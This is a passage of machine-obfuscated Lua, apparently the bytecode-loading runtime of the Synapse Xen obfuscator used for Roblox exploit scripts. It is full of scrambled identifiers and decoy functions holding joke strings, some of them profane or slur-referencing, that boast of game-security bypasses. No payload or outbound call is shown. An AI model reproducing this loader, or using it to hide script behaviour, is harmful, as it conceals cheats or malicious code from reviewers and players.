getfenv"SynapseXen_ilIliiI[1921484102]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2550753609,794375601),SynapseXen_IiilillliiIi(3524560535,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{1656675648,1140019836,1820460244,824195461,2101884187,3736967173,1341413341}return SynapseXen_ilIliiI[1921484102]end)())local SynapseXen_lIliiill=1;local SynapseXen_IiIlIiiiillllI=SynapseXen_IlilIiiiiIili(SynapseXen_iiiilIIlilllIlIiil,1,20)*2^32+SynapseXen_iIiiiIlIiiIllIlliI;local SynapseXen_IiiiIlIIilIiIliliiI=SynapseXen_IlilIiiiiIili(SynapseXen_iiiilIIlilllIlIiil,21,31)local SynapseXen_llliIliiiliIIllIii=(-1)^SynapseXen_IlilIiiiiIili(SynapseXen_iiiilIIlilllIlIiil,32)if SynapseXen_IiiiIlIIilIiIliliiI==0 then if SynapseXen_IiIlIiiiillllI==0 then return SynapseXen_llliIliiiliIIllIii*0 else SynapseXen_IiiiIlIIilIiIliliiI=1;SynapseXen_lIliiill=0 end elseif SynapseXen_IiiiIlIIilIiIliliiI==2047 then if SynapseXen_IiIlIiiiillllI==0 then return SynapseXen_llliIliiiliIIllIii*1/0 else return SynapseXen_llliIliiiliIIllIii*0/0 end end;return math.ldexp(SynapseXen_llliIliiiliIIllIii,SynapseXen_IiiiIlIIilIiIliliiI-1023)*(SynapseXen_lIliiill+SynapseXen_IiIlIiiiillllI/2^52)end;local function SynapseXen_iIlilllIII(SynapseXen_liiiliiIiiiIIllIIl)local SynapseXen_iIili;if SynapseXen_liiiliiIiiiIIllIIl then SynapseXen_iIili=SynapseXen_iIiIIi(SynapseXen_IiiIlililIlIiiii,SynapseXen_liillIIlliiiIIl,SynapseXen_liillIIlliiiIIl+SynapseXen_liiiliiIiiiIIllIIl-1)SynapseXen_liillIIlliiiIIl=SynapseXen_liillIIlliiiIIl+SynapseXen_liiiliiIiiiIIllIIl else SynapseXen_liiiliiIiiiIIllIIl=SynapseXen_iIIIIlIl()if SynapseXen_liiiliiIiiiIIllIIl==0 then return""end;SynapseXen_iIili=SynapseXen_iIiIIi(SynapseXen_IiiIlililIlIiiii,SynapseXen_liillIIlliiiIIl,SynapseXen_liillIIlliiiIIl+SynapseXen_liiiliiIiiiIIllIIl-1)SynapseXen_liillIIlliiiIIl=SynapseXen_liillIIlliiiIIl+SynapseXen_liiiliiIiiiIIllIIl end;return SynapseXen_iIili end;local function SynapseXen_IiIIiIiillil(SynapseXen_iIili)local SynapseXen_iIIliIIiIilliii={}for SynapseXen_IlIiI=1,#SynapseXen_iIili do local SynapseXen_llIlillliIl=SynapseXen_iIili:sub(SynapseXen_IlIiI,SynapseXen_IlIiI)SynapseXen_iIIliIIiIilliii[#SynapseXen_iIIliIIiIilliii+1]=string.char(SynapseXen_IiilillliiIi(string.byte(SynapseXen_llIlillliIl),SynapseXen_ilIliiI[3731878160]or(function(...)local SynapseXen_IiIil="hi my 2.5mb script doesn't work with xen please help"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2099685196,3660834920)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3757913695,537086278)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3731878160]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1155421613,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3518260141,SynapseXen_IllIiIili[1]))-string.len(SynapseXen_IiIil)-#{3470132641,661519185,1170834111,2105980783}return SynapseXen_ilIliiI[3731878160]end)("IIiilIlIiIlIii",{},"IlIlIliiIllllIi",9712,1379)))end;return table.concat(SynapseXen_iIIliIIiIilliii)end;local function SynapseXen_iiIIiIilI()local SynapseXen_iIiIlIIiIiilIiIIiiIl={}local SynapseXen_IlililIiiIllI={}local SynapseXen_lilllillilllIilIIlII={}local SynapseXen_IIlIliiiIIiiiIlII={[SynapseXen_ilIliiI[1650717969]or(function(...)local SynapseXen_IiIil="SYNAPSE XEN [FE BYPASS] [BETTER THEN LURAPH] [AMAZING] OMG OMG OMG !!!!!!"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3700464250,3303314453)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1994470451,2300519919)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1650717969]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2471371589,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(712252886,SynapseXen_IllIiIili[3]))-string.len(SynapseXen_IiIil)-#{4064943556,4260646729,3002829587,3267003931,824911922,4061971813,585640868,1588812355,2871138580,3155743230}return SynapseXen_ilIliiI[1650717969]end)("IIIi","i",21,6886,14565,5215,"llIil")]=SynapseXen_iIiIlIIiIiilIiIIiiIl,[SynapseXen_ilIliiI[1242733850]or(function(...)local SynapseXen_IiIil="my way to go against expwoiting is to have safety measuwes. i 1 wocawscwipt and onwy moduwes. hewe's how it wowks: this scwipt bewow stowes the moduwes in a tabwe fow each moduwe we send the wist with the moduwes and moduwe infowmation and use inyit a function in my moduwe that wiww stowe the info and aftew it has send to aww the moduwes it wiww dewete them. so whenyevew the cwient twies to hack they cant get the moduwes. onwy this peace of wocawscwipt."local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(201016735,3936823982)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3835902591,459092339)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1242733850]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1871408226,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3486054621,SynapseXen_IllIiIili[4]))-string.len(SynapseXen_IiIil)-#{2741874397,3448725862}return SynapseXen_ilIliiI[1242733850]end)({},{},13361,8232,"ilIlIilIll",3389,{},{},"IllliI")]=SynapseXen_lilllillilllIilIIlII,[SynapseXen_ilIliiI[3534296032]or(function(...)local SynapseXen_IiIil="now comes with a free n word pass"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(4264524451,1757095730)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3086103916,1208888876)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3534296032]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1620393180,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(4254923180,SynapseXen_IllIiIili[4]))-string.len(SynapseXen_IiIil)-#{3026704080,1006827184,639630771,1570222280,3240259067,3592785325}return SynapseXen_ilIliiI[3534296032]end)({},{},"Ii",{},{},{})]=SynapseXen_IlililIiiIllI}SynapseXen_IIlIliiiIIiiiIlII[2071787167]=SynapseXen_IiilillliiIi(SynapseXen_IliiiIIIiilIllIIlil(),SynapseXen_ilIliiI[1456950300]or(function()local SynapseXen_IiIil="wait for someone on devforum to say they are gonna deobfuscate this"SynapseXen_ilIliiI[1456950300]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2976524714,3767246373),SynapseXen_IiilillliiIi(1322125970,SynapseXen_IllIiIili[4]))-string.len(SynapseXen_IiIil)-#{2640766432,2210333402,1235537910,1838294044,3111109465,1004659691,1033569205,3111538094}return SynapseXen_ilIliiI[1456950300]end)())SynapseXen_IliiiIIIiilIllIIlil()SynapseXen_IliiiIIIiilIllIIlil()SynapseXen_IIlIliiiIIiiiIlII[874304623]=SynapseXen_IiilillliiIi(SynapseXen_IliiiIIIiilIllIIlil(),SynapseXen_ilIliiI[4175213627]or(function(...)local SynapseXen_IiIil="hi xen doesn't work on sk8r please help"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(271199172,60139637)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3262039224,1032953591)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[4175213627]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2311581375,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2434465359,SynapseXen_IllIiIili[7]))-string.len(SynapseXen_IiIil)-#{3771489655,3821262836,2322123662}return SynapseXen_ilIliiI[4175213627]end)({},"iIiIlIiliIliIIiliI",{}))SynapseXen_lIillllliIli()for SynapseXen_IiliiliIiiIiiIliIlI=1,SynapseXen_IiilillliiIi(SynapseXen_IIiIllIi(),SynapseXen_ilIliiI[3338979896]or(function()local SynapseXen_IiIil="pain is gonna use the backspace method on xen"SynapseXen_ilIliiI[3338979896]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3240398579,380592753),SynapseXen_IiilillliiIi(789167596,SynapseXen_IllIiIili[5]))-string.len(SynapseXen_IiIil)-#{4022989847,390567114,1982735004,77807044,894942979,2831284744,1601796188,3561999850,3132538100,3105919124}return SynapseXen_ilIliiI[3338979896]end)())do SynapseXen_lIillllliIli()local SynapseXen_iIIlilIl=SynapseXen_IiilillliiIi(SynapseXen_lIillllliIli(),SynapseXen_ilIliiI[3608674783]or(function()local SynapseXen_IiIil="this is a christian obfuscator, no cursing allowed in our scripts"SynapseXen_ilIliiI[3608674783]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2404442456,3643760164),SynapseXen_IiilillliiIi(1314717610,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{3395694261,2480005133,2078893472,4284303983,3940078644,3815363209,4012679640,1641912613,1964667898,2274081337}return SynapseXen_ilIliiI[3608674783]end)())local SynapseXen_lIlliliIlI=SynapseXen_IliiiIIIiilIllIIlil()SynapseXen_IliiiIIIiilIllIIlil()local SynapseXen_iIIiIliIiiIIIIi=SynapseXen_IliiiIIIiilIllIIlil()local SynapseXen_illIIilIiIIiIIill={[497366273]=SynapseXen_iIIlilIl,[2075702005]=SynapseXen_lIlliliIlI,[253265259]=SynapseXen_IlilIiiiiIili(SynapseXen_iIIlilIl,1,6),[1152160448]=SynapseXen_IlilIiiiiIili(SynapseXen_iIIlilIl,7,14)}if SynapseXen_iIIiIliIiiIIIIi==(SynapseXen_ilIliiI[523360511]or(function(...)local SynapseXen_IiIil="imagine using some lua minifier tool and thinking you are a badass"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(356405339,2102268817)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3745956193,548978989)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[523360511]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1077598420,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(589961119,SynapseXen_IllIiIili[7]))-string.len(SynapseXen_IiIil)-#{11064321,342327211,2454213896,1175030178,1399283916,640432413}return SynapseXen_ilIliiI[523360511]end)("liIIllli",8764,{},{},{},{},10169,"lIiI"))then SynapseXen_illIIilIiIIiIIill[1402414475]=SynapseXen_IlilIiiiiIili(SynapseXen_iIIlilIl,24,32)SynapseXen_illIIilIiIIiIIill[221391887]=SynapseXen_IlilIiiiiIili(SynapseXen_iIIlilIl,15,23)elseif SynapseXen_iIIiIliIiiIIIIi==(SynapseXen_ilIliiI[4074475973]or(function()local SynapseXen_IiIil="print(bytecode)"SynapseXen_ilIliiI[4074475973]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1912978837,3974251338),SynapseXen_IiilillliiIi(2895221055,SynapseXen_IllIiIili[1]))-string.len(SynapseXen_IiIil)-#{3788503389}return SynapseXen_ilIliiI[4074475973]end)())then SynapseXen_illIIilIiIIiIIill[2116109763]=SynapseXen_IlilIiiiiIili(SynapseXen_iIIlilIl,15,32)elseif SynapseXen_iIIiIliIiiIIIIi==(SynapseXen_ilIliiI[2553514265]or(function(...)local SynapseXen_IiIil="i put more time into this shitty list of dead memes then i did into the obfuscator itself"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(583425464,225903522)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3354341724,940647074)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2553514265]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3767344719,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3294543403,SynapseXen_IllIiIili[7]))-string.len(SynapseXen_IiIil)-#{818881130,2641166741,1416465228,2904398867}return SynapseXen_ilIliiI[2553514265]end)(7105,"IlIIlIi","ilIliiilIiiiilIIIll",{},10675,{}))then SynapseXen_illIIilIiIIiIIill[990094981]=SynapseXen_IlilIiiiiIili(SynapseXen_iIIlilIl,15,32)-131071 end;SynapseXen_lilllillilllIilIIlII[SynapseXen_IiliiliIiiIiiIliIlI]=SynapseXen_illIIilIiIIiIIill end;SynapseXen_lIillllliIli()SynapseXen_IliiiIIIiilIllIIlil()for SynapseXen_IiliiliIiiIiiIliIlI=1,SynapseXen_IiilillliiIi(SynapseXen_IIiIllIi(),SynapseXen_ilIliiI[2653029917]or(function(...)local SynapseXen_IiIil="wow xen is shit buy luraph ok"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2684747121,2103883481)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3213315501,1081631010)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2653029917]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(500645172,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(592343085,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2306401165,206755677,1730521950,3087363599,4082464569,2312589097,1265583629,1253977098,3085408702,2889977431}return SynapseXen_ilIliiI[2653029917]end)("IlIliIlliiiIil",3596,11372,"iI",12832,7790,{},{},"liliiII",9331))do SynapseXen_IliiiIIIiilIllIIlil()local SynapseXen_iIIiIliIiiIIIIi=SynapseXen_IliiiIIIiilIllIIlil()local SynapseXen_lIiilIl;if SynapseXen_iIIiIliIiiIIIIi==(SynapseXen_ilIliiI[607044614]or(function(...)local SynapseXen_IiIil="level 1 crook = luraph, level 100 boss = xen"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2570579146,2503503472)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3720293815,574683093)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[607044614]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1311831610,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(210982268,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2475293098,4029855342,3257600483,15199415,4172582731}return SynapseXen_ilIliiI[607044614]end)(6981,{}))then SynapseXen_lIiilIl=SynapseXen_IliiiIIIiilIllIIlil()~=0 elseif SynapseXen_iIIiIliIiiIIIIi==(SynapseXen_ilIliiI[1047017424]or(function(...)local SynapseXen_IiIil="sponsored by ironbrew, jk xen is better"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3930313165,2277362695)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3710709072,584237842)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1047017424]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3807979590,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3249255460,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{1865844408}return SynapseXen_ilIliiI[1047017424]end)({}))then SynapseXen_lIiilIl=SynapseXen_iIIililIiiiill()elseif SynapseXen_iIIiIliIiiIIIIi==(SynapseXen_ilIliiI[1434424291]or(function()local SynapseXen_IiIil="now with shitty xor string obfuscation"SynapseXen_ilIliiI[1434424291]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(630522874,3136522014),SynapseXen_IiilillliiIi(3519745702,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{1355206098,1452874204,2655529095,3373788803,1613320333,2819424158}return SynapseXen_ilIliiI[1434424291]end)())then SynapseXen_lIiilIl=SynapseXen_iIiIIi(SynapseXen_IiIIiIiillil(SynapseXen_iIlilllIII()),1,-2)end;SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IiliiliIiiIiiIliIlI-1]=SynapseXen_lIiilIl end;SynapseXen_lIillllliIli()for SynapseXen_IiliiliIiiIiiIliIlI=1,SynapseXen_IiilillliiIi(SynapseXen_IIiIllIi(),SynapseXen_ilIliiI[2381264180]or(function()local SynapseXen_IiIil="i'm intercommunication about the most nonecclesiastical dll exploits for esp. they only characterization objects with a antepatriarchal in the geistesgeschichte for the esp."SynapseXen_ilIliiI[2381264180]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2938048768,141602487),SynapseXen_IiilillliiIi(812756732,SynapseXen_IllIiIili[8]))-string.len(SynapseXen_IiIil)-#{3753710585,2882897954,42431269,2131245162}return SynapseXen_ilIliiI[2381264180]end)())do SynapseXen_IlililIiiIllI[SynapseXen_IiliiliIiiIiiIliIlI-1]=SynapseXen_iiIIiIilI()end;return SynapseXen_IIlIliiiIIiiiIlII end;do assert(SynapseXen_iIlilllIII(4)=="\27Xen","Synapse Xen - Failed to verify bytecode. Please make sure your Lua implementation supports non-null terminated strings.")SynapseXen_IIiIllIi=SynapseXen_lIillllliIli;SynapseXen_iIIIIlIl=SynapseXen_lIillllliIli;local SynapseXen_iIiliiliiililill=SynapseXen_iIlilllIII()SynapseXen_IiIilliilIIl=SynapseXen_iliIiIIIiilIliIIil(SynapseXen_IIiIllIi())SynapseXen_lIillllliIli()SynapseXen_IliiiIIIiilIllIIlil()local SynapseXen_lIIlI=0;for SynapseXen_IlIiI=1,#SynapseXen_iIiliiliiililill do local SynapseXen_llIlillliIl=SynapseXen_iIiliiliiililill:sub(SynapseXen_IlIiI,SynapseXen_IlIiI)SynapseXen_lIIlI=SynapseXen_lIIlI+string.byte(SynapseXen_llIlillliIl)end;SynapseXen_lIIlI=SynapseXen_IiilillliiIi(SynapseXen_lIIlI,SynapseXen_IiIilliilIIl)for SynapseXen_IiliiliIiiIiiIliIlI=1,SynapseXen_IliiiIIIiilIllIIlil()do SynapseXen_IllIiIili[SynapseXen_IiliiliIiiIiiIliIlI]=SynapseXen_iIIIllIlIIll(SynapseXen_IIiIllIi(),SynapseXen_lIIlI)end;SynapseXen_IiiliIlIllIil()end;return SynapseXen_iiIIiIilI()end;local function SynapseXen_iIlliII(...)return SynapseXen_iiiIiIlliII('#',...),{...}end;local function SynapseXen_liilIIiiiIiIlii(SynapseXen_IIlIliiiIIiiiIlII,SynapseXen_llIll,SynapseXen_lIiiIIlIlIllIIiIil)local SynapseXen_iIiIlIIiIiilIiIIiiIl=SynapseXen_IIlIliiiIIiiiIlII[SynapseXen_ilIliiI[1650717969]or(function(...)local SynapseXen_IiIil="SYNAPSE XEN [FE BYPASS] [BETTER THEN LURAPH] [AMAZING] OMG OMG OMG !!!!!!"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3700464250,3303314453)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1994470451,2300519919)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1650717969]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2471371589,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(712252886,SynapseXen_IllIiIili[3]))-string.len(SynapseXen_IiIil)-#{4064943556,4260646729,3002829587,3267003931,824911922,4061971813,585640868,1588812355,2871138580,3155743230}return SynapseXen_ilIliiI[1650717969]end)("IIIi","i",21,6886,14565,5215,"llIil")]local SynapseXen_IlililIiiIllI=SynapseXen_IIlIliiiIIiiiIlII[SynapseXen_ilIliiI[3534296032]or(function(...)local SynapseXen_IiIil="now comes with a free n word pass"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(4264524451,1757095730)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3086103916,1208888876)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3534296032]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1620393180,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(4254923180,SynapseXen_IllIiIili[4]))-string.len(SynapseXen_IiIil)-#{3026704080,1006827184,639630771,1570222280,3240259067,3592785325}return SynapseXen_ilIliiI[3534296032]end)({},{},"Ii",{},{},{})]local SynapseXen_lilllillilllIilIIlII=SynapseXen_IIlIliiiIIiiiIlII[SynapseXen_ilIliiI[1242733850]or(function(...)local SynapseXen_IiIil="my way to go against expwoiting is to have safety measuwes. i 1 wocawscwipt and onwy moduwes. hewe's how it wowks: this scwipt bewow stowes the moduwes in a tabwe fow each moduwe we send the wist with the moduwes and moduwe infowmation and use inyit a function in my moduwe that wiww stowe the info and aftew it has send to aww the moduwes it wiww dewete them. so whenyevew the cwient twies to hack they cant get the moduwes. onwy this peace of wocawscwipt."local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(201016735,3936823982)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3835902591,459092339)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1242733850]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1871408226,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3486054621,SynapseXen_IllIiIili[4]))-string.len(SynapseXen_IiIil)-#{2741874397,3448725862}return SynapseXen_ilIliiI[1242733850]end)({},{},13361,8232,"ilIlIilIll",3389,{},{},"IllliI")]return function(...)local 